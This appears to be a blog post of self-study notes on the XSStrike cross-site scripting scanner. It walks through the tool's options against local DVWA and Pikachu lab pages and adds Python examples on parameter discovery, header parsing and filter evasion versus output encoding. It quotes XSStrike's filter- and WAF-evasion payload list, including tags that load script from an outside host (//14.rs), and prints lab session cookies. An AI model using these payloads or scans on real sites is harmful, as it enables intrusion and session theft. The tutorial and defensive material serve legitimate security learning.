Network Security - XSStrike Chinese Manual [Self-study Notes]

Install

clone

git clone https://github.com/s0md3v/XSStrike.git

Install dependencies

pip3 install -r requirements.txt

Environment requirements

python version

>=3.4

operating system

Linux (Arch, Debian, Ubuntu), Termux, Windows (7 & 10), Mac

options

help 

python xsstrike.py -h

add target url

single

GET method

Options: -u or --url

python xsstrike.py -u "http://example.com/search.php?q=query"
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert('xss')</script>"

POST method

option: --data

python xsstrike.py -u "http://example.com/search.php" --data "q=query"
python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_s/" --data "txtName=test&mtxMessage=This+is+a+test+comment.&btnSign=Sign+Guestbook"


from file

Option: --seeds (use instead of -u)

python xsstrike.py --seeds urls.txt

File contents: one target URL per line.

Test url path components

options: --path

Use this when the payload should go into a URL path component rather than a query parameter, e.g. http://example.com/search/<payload>

python xsstrike.py -u "http://example.com/search/form/query" --path

POST data is in json format

options: --json

python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"}' --json

Crawling

Crawl outward from the target page, collecting further URLs and forms, and test what is found.

default

options: --crawl

python xsstrike.py -u "http://example.com/page.php" --crawl

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/" --crawl

1/1 is what it found, and it doesn't even add a space, which is not very mature.

crawl depth

Option: -l or --level, default: 2

python xsstrike.py -u "http://example.com/page.php" --crawl -l 3

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/" --crawl -l 3

Read payloads from file

Options: -f or --file

python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=''" -f payloads.txt

After the test completed, no result was given???

Find hidden parameters

options: --params

python xsstrike.py -u "http://example.com/page.php" --params 

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/" --params

This little thing is really something :). I can't even write the article; it's far from sqlmap!!!
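What --params actually has to do is guess parameter names and notice which ones the server reads. The following is an added example of my own, not XSStrike's code: it sends batches of candidate names, each carrying its own random marker, and reports the names whose marker is echoed back. The fake_target function is a constructed stand-in for the web page (it reflects "name" visibly and "debug" inside an HTML comment), so the example runs offline; swap in a real fetch function (requests.get with params=...) to probe a live target.

```python
import secrets


def fake_target(url: str, params: dict) -> str:
    """Constructed stand-in for the target page (not a real DVWA response).

    It reflects 'name' visibly, reflects 'debug' only inside an HTML comment,
    and silently ignores every other parameter.
    """
    body = "<html><body><h1>Vulnerability: Reflected XSS</h1>"
    if "name" in params:
        body += "<pre>Hello " + params["name"] + "</pre>"
    if "debug" in params:
        body += "<!-- debug=" + params["debug"] + " -->"
    return body + "</body></html>"


def find_reflected_params(fetch, url, wordlist, batch_size=8):
    """Return the candidate parameter names whose values are reflected in the response.

    Each candidate gets its own random marker and candidates are sent in batches,
    so one request tests several names at once; a marker that comes back in the
    body proves the server read that parameter. This finds *reflecting*
    parameters only; a parameter that changes the page without echoing its value
    (for example by altering the response length) needs a baseline comparison
    on top of this, which is out of scope here.
    """
    found = []
    names = list(dict.fromkeys(wordlist))          # de-duplicate, keep order
    for start in range(0, len(names), batch_size):
        batch = names[start:start + batch_size]
        # "m" + 8 hex chars: alphanumeric, so it survives HTML-escaping on output
        markers = {name: "m" + secrets.token_hex(4) for name in batch}
        body = fetch(url, markers)
        found.extend(name for name, marker in markers.items() if marker in body)
    return found


if __name__ == "__main__":
    # Constructed wordlist; a real run would use a few thousand common names.
    wordlist = ["id", "name", "debug", "page", "q", "redirect", "callback"]
    hits = find_reflected_params(fake_target,
                                 "http://127.0.0.1/dvwa/vulnerabilities/xss_r/",
                                 wordlist)
    print("reflected parameters:", hits)   # each one is a candidate XSS sink
```

Every name this returns is a reflection point, i.e. exactly the kind of parameter you would then hand to xsstrike.py with -u "...?name=x" for the actual payload testing. Hidden parameters that the application reads but never echoes (feature flags, sort orders) are missed by reflection alone.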

Timing options

Threads

Option: -t or --threads, default: 2

python xsstrike.py -u "http://example.com" -t 10 --crawl -l 3

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/" -t 3 --crawl -l 3

time out

Option: --timeout, default: 7 (seconds)

python xsstrike.py -u "http://example.com/page.php?q=query" --timeout=4

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --timeout=3

Delay

delay between two requests

Option: -d or --delay, default: 0 (seconds)

python xsstrike.py -u "http://example.com/page.php?q=query" -d 2

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" -d 2

headers

Option: --headers, multiple headers separated by \n, each written as Name: value (with a space after the colon, as in the first example below; a header written as Cookie:security=low without that space may not be parsed, so confirm that the session cookie actually reaches the target)

python xsstrike.py -u http://example.com/page.php?q=query --headers "Accept-Language: en-US\nCookie: null"

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --headers "Cookie:security=low; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=h9u1rmfie6ck34qsa2890777o1"

It's so nice that I can't help but capture the traffic!!!

Big brother??? What about the cookies??? WTF

Forget the previous one, it should be a cookie problem; I lost my mind doing this. Is this GitHub's number-one XSS injection tool???
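One practical check when a scanner seems to ignore the cookie you gave it: parse the --headers string yourself and confirm the cookie survives. The following is an added example of my own, not XSStrike's code. The sample header strings are constructed; whether XSStrike's parser is as strict about the space after the colon as the strict variant here is an assumption to verify against core/utils.py in your copy.

```python
import re

# Constructed sample --headers values, written the way a shell passes them:
# the "\n" between headers is two literal characters (backslash and n), not a newline.
HEADERS_OK = r"Accept-Language: en-US\nCookie: security=low; PHPSESSID=abc123"
HEADERS_NO_SPACE = r"Cookie:security=low; PHPSESSID=abc123"


def parse_headers_strict(raw: str) -> dict:
    """Strict 'Name: value' parser that insists on whitespace after the colon.

    Modelled on the README's example format; it is an assumption (check
    core/utils.py in your copy) that XSStrike's own parser is this strict.
    """
    text = raw.replace("\\n", "\n")          # turn the literal \n into real line breaks
    pairs = re.findall(r"^([^:\n]+):\s(.*)$", text, re.MULTILINE)
    return {name.strip(): value.strip() for name, value in pairs}


def parse_headers_tolerant(raw: str) -> dict:
    """Tolerant parser: split each line on the first colon and strip both sides,
    so 'Cookie:security=low' and 'Cookie: security=low' both work."""
    headers = {}
    for line in raw.replace("\\n", "\n").splitlines():
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            continue                          # not a header line at all
        headers[name.strip()] = value.strip()
    return headers


def parse_cookie_header(headers: dict) -> dict:
    """Break the Cookie header into individual name=value pairs."""
    cookies = {}
    for part in headers.get("Cookie", "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def missing_cookies(headers: dict, required=("security", "PHPSESSID")) -> list:
    """Names from `required` that did not survive parsing.

    For DVWA, losing PHPSESSID means every request is bounced to the login page
    (the scanner then sees a login form instead of the reflected parameter), and
    losing security=low means the app falls back to its stricter default level.
    """
    present = parse_cookie_header(headers)
    return [name for name in required if name not in present]


if __name__ == "__main__":
    for raw in (HEADERS_OK, HEADERS_NO_SPACE):
        strict = parse_headers_strict(raw)
        print(repr(raw))
        print("  strict  :", strict, "missing cookies:", missing_cookies(strict))
        print("  tolerant:", parse_headers_tolerant(raw))
```

If the strict parser drops your Cookie header, rewrite it as "Cookie: security=low; PHPSESSID=..." with the space, and confirm in a proxy or with the file log that the cookie is really being sent before blaming the tool's scanning logic.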

Blind XSS

Option: --blind

When crawling with this option, XSStrike injects the blind XSS payload defined in core/config.py (the blindPayload variable, which is empty by default and must be set to a payload that calls back to a server you control, so a hit is reported even where nothing is reflected) into every parameter of every HTML form it finds.

Note that the payloads tuple from core/config.py shown below is the filter/WAF-evasion list used for ordinary scanning, not the blind payload:

python xsstrike.py -u "http://example.com/page.php?q=query" --crawl --blind

payloads = (  # Payloads for filter & WAF evasion
    '\'"</Script><Html Onmouseover=(confirm)()//'
    '<imG/sRc=l oNerrOr=(prompt)() x>',
    '<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
    '<deTails open oNToggle=confi\u0072m()>',
    '<img sRc=l oNerrOr=(confirm)() x>',
    '<svg/x=">"/onload=confirm()//',
    '<svg%0Aonload=%09((pro\u006dpt))()//',
    '<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
    '<sCript x>confirm``</scRipt x>',
    '<Script x>prompt()</scRiPt x>',
    '<sCriPt sRc=//14.rs>',
    '<embed//sRc=//14.rs>',
    '<base href=//14.rs/><script src=/>',
    '<object//data=//14.rs>',
    '<s=" onclick=confirm``>clickme',
    '<svG oNLoad=co\u006efirm(1)>',
    '\'"><y///oNMousEDown=((confirm))()>Click',
    '<a/href=javascript:co\u006efirm("1")>clickme</a>',
    '<img src=x onerror=confir\u006d`1`>',
    '<svg/onload=co\u006efir\u006d`1`>')

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --crawl --blind
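To see why the list above is written with mixed case, slashes as separators and %0A/%09 in place of spaces, here is an added Python example of my own (not XSStrike's code). It takes a few of those payloads, with the event names in plain ASCII as they are in the repository, and runs them against a naive case-sensitive blocklist of the kind they are built to slip past, then against a filter that normalizes the input before matching, and finally through output encoding, which is the fix that does not depend on a blocklist at all. The blocklists and the normalization steps are my own, constructed for the demonstration.

```python
import html
import re
from urllib.parse import unquote

# A handful of the evasion payloads from core/config.py quoted above.
SAMPLE_PAYLOADS = [
    '<svG oNLoad=confirm(1)>',
    '<imG/sRc=l oNerrOr=(prompt)() x>',
    '<deTails open oNToggle=confirm()>',
    '<svg%0Aonload=%09((prompt))()//',
    '<sCript x>confirm``</scRipt x>',
    '<a/href=javascript:confirm("1")>clickme</a>',
]

# The kind of filter these payloads target: a case-sensitive substring
# blocklist applied to the raw, still URL-encoded input.
NAIVE_BLOCKLIST = ("<script", "onload=", "onerror=", "javascript:")


def naive_filter_blocks(value: str) -> bool:
    """True if the naive blocklist would reject the value as submitted."""
    return any(bad in value for bad in NAIVE_BLOCKLIST)


def normalize(value: str) -> str:
    """Undo the cheap transformations the payloads rely on before matching:
    URL/HTML decoding (repeated, for stacked encodings), case folding, and
    collapsing tabs, newlines and '/' (all valid separators inside a tag)."""
    text = value
    for _ in range(3):
        decoded = html.unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    return re.sub(r"[\s/]+", " ", text.lower())


# Tags with known script sinks, any on*= handler, and the javascript: scheme.
DANGEROUS = re.compile(
    r"<\s*(script|svg|img|details|iframe|embed|object|base)\b"
    r"|\bon[a-z]+\s*="
    r"|javascript\s*:"
)


def hardened_filter_blocks(value: str) -> bool:
    """True if the normalizing filter rejects the value."""
    return DANGEROUS.search(normalize(value)) is not None


def render_safe(value: str) -> str:
    """Contextual output encoding for an HTML text/attribute context: the
    payload is kept but can no longer open a tag or break out of a quote."""
    return html.escape(value, quote=True)


def evasion_report():
    """(payload, blocked by naive filter, blocked by hardened filter) per sample."""
    return [(p, naive_filter_blocks(p), hardened_filter_blocks(p)) for p in SAMPLE_PAYLOADS]


if __name__ == "__main__":
    for payload, naive, hardened in evasion_report():
        print(f"naive={'BLOCK' if naive else 'pass '}  hardened={'BLOCK' if hardened else 'pass '}  {payload}")
        print("   rendered safely as:", render_safe(payload))
```

Four of the six samples walk straight through the naive filter; only the two that happen to contain a lowercase blocklist string are caught. The normalizing filter catches all six, but it is still a blocklist: it will flag harmless input such as online=1, and it does nothing for JavaScript-level escapes, stacked encodings deeper than the loop unwinds, or contexts other than HTML. The render_safe output is the one result that holds for every payload regardless of how it is spelled, which is why output encoding, not input blocklisting, is the fix a scanner like this should push you toward.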

payload encoding

Option: -e or --encode

XSStrike can encode payloads on demand. Currently only base64 is supported.

python xsstrike.py -u "http://example.com/page.php?q=query" -e base64

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" -e base64

fuzz testing

options: --fuzzer

This fuzzer is designed to test filters and web application firewalls.

python xsstrike.py -u "http://example.com/search.php?q=query" --fuzzer

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --fuzzer

Log levels

Option (console): --console-log-level, default: INFO

python xsstrike.py -u "http://example.com/search.php?q=query" --console-log-level WARNING

Option (file): --file-log-level, default: None

python xsstrike.py -u "http://example.com/search.php?q=query" --file-log-level DEBUG

Option (used together with --file-log-level): --log-file, default: xsstrike.log

python xsstrike.py -u "http://example.com/search.php?q=query" --file-log-level INFO --log-file output.log

python xsstrike.py -u "http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name='<script>alert('lady_killer')</script>'" --crawl --blind --headers "Cookie:security=low; csrftoken=7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSID=h9u1rmfie6ck34qsa2890777o1" --file-log-level INFO

I can discover this myself... Wasted time; went to sleep...

Keep going... maybe someday it will work out.

skip confirmation prompt

Option: --skip

Use this option if you want XSStrike to continue scanning after finding a working payload without asking. It will also skip the generation of the POC.

python xsstrike.py -u "http://example.com/search.php?q=query" --skip

python xsstrike.py -u "127.0.0.1/dvwa/vulnerabilities/xss_r/?name=s" --skip

Skip Dom scanning

Option: --skip-dom

If you already know the target is not DOM-based XSS, skip the DOM scan to save time.

python xsstrike.py -u "http://example.com/search.php?q=query" --skip-dom

python xsstrike.py -u "127.0.0.1/dvwa/vulnerabilities/xss_r/?name=s" --skip-dom

Indeed, no DOM check was run.

Update

options: --update

python xsstrike.py --update


Analysis (DVWA did not work)

From all of the above you have seen plenty of my complaints. It seems to be DVWA's cookie problem; this software does not seem to handle cookies well.

I tried the Pikachu target again, and it works.

python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=q&submit=submit" --skip-dom

When I have time I will write up Pikachu's XSS injection with XSStrike.

Source: blog.csdn.net/yinjiyufei/article/details/131031796